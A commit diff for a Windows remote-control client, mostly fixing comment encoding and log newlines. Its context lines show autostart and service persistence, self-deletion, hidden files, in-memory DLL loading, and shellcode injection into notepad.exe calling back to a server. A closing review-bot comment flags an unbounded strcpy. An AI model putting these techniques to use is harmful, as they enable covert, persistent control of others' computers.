Improvement: Add runasAdmin to client building options

yuanyuanxiang
2025-12-12 20:33:33 +01:00
parent 93d6e730b8
commit 460f6c44bc
6 changed files with 108 additions and 92 deletions


@@ -192,7 +192,7 @@ int main(int argc, const char *argv[])
if (r <= 0) {
BOOL s = self_del();
if (!IsDebug) {
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Sleep(1000);
return r;
}
@@ -209,7 +209,7 @@ int main(int argc, const char *argv[])
Mprintf(" Arg [%d]: %s\n", i, argv[i]);
}
if (ret) {
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Sleep(1000);
return 0x20251123;
}
@@ -222,7 +222,7 @@ int main(int argc, const char *argv[])
CloseHandle(hMutex);
hMutex = NULL;
#ifndef _DEBUG
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Sleep(1000);
return -2;
#endif
@@ -258,7 +258,7 @@ int main(int argc, const char *argv[])
status = E_STOP;
CloseHandle(hMutex);
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Logger::getInstance().stop();
return 0;


@@ -1,4 +1,4 @@

#include "StdAfx.h"
#include "MemoryModule.h"
#include "ShellcodeInj.h"
@@ -17,7 +17,7 @@ extern "C" {
#pragma comment(lib, "ws2_32.lib")
// <EFBFBD>Զ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
// 自动启动注册表中的值
#define REG_NAME "ClientDemo"
typedef void (*StopRun)();
@@ -26,13 +26,13 @@ typedef bool (*IsStoped)();
typedef BOOL (*IsExit)();
// ֹͣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 停止程序运行
StopRun stop = NULL;
// <EFBFBD>Ƿ<EFBFBD><EFBFBD>ɹ<EFBFBD>ֹͣ
// 是否成功停止
IsStoped bStop = NULL;
// <EFBFBD>Ƿ<EFBFBD><EFBFBD>˳<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ض<EFBFBD>
// 是否退出被控端
IsExit bExit = NULL;
BOOL status = 0;
@@ -53,7 +53,7 @@ BOOL CALLBACK callback(DWORD CtrlType)
return TRUE;
}
// <EFBFBD><EFBFBD><EFBFBD>г<EFBFBD><EFBFBD><EFBFBD>.
// 运行程序.
BOOL Run(const char* argv1, int argv2);
// Package header.
@@ -77,16 +77,16 @@ protected:
HMEMORYMODULE m_mod;
std::string GetIPAddress(const char* hostName)
{
// 1. <EFBFBD>ж<EFBFBD><EFBFBD>Dz<EFBFBD><EFBFBD>ǺϷ<EFBFBD><EFBFBD><EFBFBD> IPv4 <EFBFBD><EFBFBD>ַ
// 1. 判断是不是合法的 IPv4 地址
sockaddr_in sa;
if (inet_pton(AF_INET, hostName, &(sa.sin_addr)) == 1) {
// <EFBFBD>ǺϷ<EFBFBD> IPv4 <EFBFBD><EFBFBD>ַ<EFBFBD><EFBFBD>ֱ<EFBFBD>ӷ<EFBFBD><EFBFBD><EFBFBD>
// 是合法 IPv4 地址,直接返回
return std::string(hostName);
}
// 2. <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Խ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 2. 否则尝试解析域名
addrinfo hints = {}, * res = nullptr;
hints.ai_family = AF_INET; // ֻ֧<EFBFBD><EFBFBD> IPv4
hints.ai_family = AF_INET; // 只支持 IPv4
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
@@ -210,22 +210,22 @@ public:
}
};
// @brief <EFBFBD><EFBFBD><EFBFBD>ȶ<EFBFBD>ȡsettings.ini<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡIP<EFBFBD>Ͷ˿<EFBFBD>.
// @brief 首先读取settings.ini配置文件获取IP和端口.
// [settings]
// localIp=XXX
// ghost=6688
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھʹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD>ȡIP<EFBFBD>Ͷ˿<EFBFBD>.
// 如果配置文件不存在就从命令行中获取IP和端口.
int main(int argc, const char *argv[])
{
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %s %s. Arg Count: %d\n", argv[0], argc > 1 ? argv[1] : "", argc);
Mprintf("启动运行: %s %s. Arg Count: %d\n", argv[0], argc > 1 ? argv[1] : "", argc);
InitWindowsService({"ClientDemoService", "Client Demo Service", "Provide a demo service."}, Log);
bool isService = g_ConnectAddress.iStartup == Startup_TestRunMsc;
// ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 注册启动项
int r = RegisterStartup("Client Demo", "ClientDemo", !isService, g_ConnectAddress.runasAdmin, Logf);
if (r <= 0) {
BOOL s = self_del();
if (!IsDebug) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return r;
}
@@ -233,7 +233,7 @@ int main(int argc, const char *argv[])
BOOL ok = SetSelfStart(argv[0], REG_NAME);
if(!ok) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
Mprintf("设置开机自启动失败,请用管理员权限运行.\n");
}
if (isService) {
@@ -243,7 +243,7 @@ int main(int argc, const char *argv[])
Mprintf(" Arg [%d]: %s\n", i, argv[i]);
}
if (ret) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return 0x20251202;
}
@@ -262,7 +262,7 @@ int main(int argc, const char *argv[])
g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
}
// <EFBFBD><EFBFBD> Shell code <EFBFBD><EFBFBD><EFBFBD>ӱ<EFBFBD><EFBFBD><EFBFBD>6543<EFBFBD>˿ڣ<EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD>±<EFBFBD>
// Shell code 连接本机6543端口注入到记事本
if (g_ConnectAddress.iStartup == Startup_InjSC) {
// Try to inject shell code to `notepad.exe`
// If failed then run memory DLL
@@ -289,7 +289,7 @@ int main(int argc, const char *argv[])
CloseHandle(hProcess);
Mprintf("Process [%d] is finished.\n", pid);
if (status == 1) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return -1;
}
@@ -305,21 +305,21 @@ int main(int argc, const char *argv[])
argv[1] : (strlen(g_ConnectAddress.ServerIP()) == 0 ? "127.0.0.1" : g_ConnectAddress.ServerIP()),
argc > 2 ? atoi(argv[2]) : (g_ConnectAddress.ServerPort() == 0 ? 6543 : g_ConnectAddress.ServerPort()));
if (ret == 1) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return -1;
}
} while (status == 0);
status = 0;
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
Logger::getInstance().stop();
return 0;
}
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>в<EFBFBD><EFBFBD><EFBFBD>: IP <20><> <20>˿<EFBFBD>.
// 传入命令行参数: IP 和 端口.
BOOL Run(const char* argv1, int argv2)
{
BOOL result = FALSE;
@@ -344,7 +344,7 @@ BOOL Run(const char* argv1, int argv2)
Mprintf("Error removing file. Error code: %d\n", GetLastError());
ok = FALSE;
} else {
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 设置文件属性为隐藏
if (SetFileAttributesA(oldFile.c_str(), FILE_ATTRIBUTE_HIDDEN)) {
Mprintf("File created and set to hidden: %s\n",oldFile.c_str());
}
@@ -377,7 +377,7 @@ BOOL Run(const char* argv1, int argv2)
bExit = hDll ? IsExit(runner->GetProcAddress(hDll, "IsExit")) : NULL;
if (NULL == run) {
if (hDll) runner->FreeLibrary(hDll);
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ض<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
Mprintf("加载动态链接库\"ServerDll.dll\"失败. 错误代码: %d\n", GetLastError());
Sleep(3000);
delete runner;
return FALSE;
@@ -387,7 +387,7 @@ BOOL Run(const char* argv1, int argv2)
strcpy_s(ip, g_ConnectAddress.ServerIP());
int port = g_ConnectAddress.ServerPort();
strcpy(p + 1, "settings.ini");
if (_access(path, 0) == -1) { // <EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: <20><><EFBFBD>ȴӲ<C8B4><D3B2><EFBFBD><EFBFBD><EFBFBD>ȡֵ<C8A1><D6B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ǵ<EFBFBD>g_ConnectAddressȡֵ.
if (_access(path, 0) == -1) { // 文件不存在: 优先从参数中取值,其次是从g_ConnectAddress取值.
strcpy(ip, argv1);
port = argv2;
} else {
@@ -409,9 +409,9 @@ BOOL Run(const char* argv1, int argv2)
}
} while (result == 2);
if (!runner->FreeLibrary(hDll)) {
Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
Mprintf("释放动态链接库\"ServerDll.dll\"失败. 错误代码: %d\n", GetLastError());
} else {
Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"<EFBFBD>ɹ<EFBFBD>!\n");
Mprintf("释放动态链接库\"ServerDll.dll\"成功!\n");
}
delete runner;
return result;
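Review bot: In the `@@ -387,7 +387,7 @@` hunk, `strcpy(ip, argv1);` copies the caller-supplied address into `ip` with no length check, although the line two above fills the same buffer with the bounded `strcpy_s(ip, g_ConnectAddress.ServerIP());`. Judging by the `@@ -305,21 +305,21 @@` hunk, `argv1` appears to come from `argv[1]` in `main`, so an over-long command-line argument would write past the end of `ip`. The declaration of `ip` is outside the hunk, but the two-argument `strcpy_s` call implies a fixed-size array, so the same form works here: `strcpy_s(ip, argv1);`, which fails loudly on over-long input instead of corrupting adjacent memory. `strcpy(p + 1, "settings.ini");` in the same hunk deserves the same treatment once the remaining room in `path` (also declared outside the hunk) is known.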